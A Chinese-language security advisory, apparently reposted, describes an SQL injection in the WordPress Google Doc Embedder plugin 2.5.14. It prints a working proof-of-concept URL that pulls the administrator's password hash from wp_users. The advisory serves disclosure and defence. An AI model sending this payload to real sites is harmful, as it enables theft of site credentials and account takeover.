WordPress Google Doc Embedder插件'google

发布日期:2014-11-11
更新日期:2014-11-27

受影响系统:
WordPress Google Doc Embedder 2.5.14
 WordPress Google Doc Embedder
描述:
BUGTRAQ  ID: 71304

Google Doc Embedder插件可将PDF、MS Office及其他文件类型嵌入到网页中。

Google Doc Embedder Plugin 2.5.14及其他版本在实现上存在sql注入漏洞,成功利用后可使攻击者执行未授权数据库操作。

<*来源:Kacper Szurek
  *>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/wp-content/plugins/google-document-embedder/view.php?embedded=1&amp;amp;gpid=0 UNION SELECT 1, 2, 3, CONCAT(CAST(CHAR(97, 58, 49, 58, 123, 115, 58, 54, 58, 34, 118, 119, 95, 99, 115, 115, 34, 59, 115, 58) as CHAR), LENGTH(user_pass), CAST(CHAR(58, 34) as CHAR), user_pass, CAST(CHAR(34, 59, 125) as CHAR)) FROM `wp_users` WHERE ID=1

建议:
厂商补丁:

WordPress
 ---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://www.heiqu.com/8617c9483b8c7fb2cdd74b5b2d5423f5.html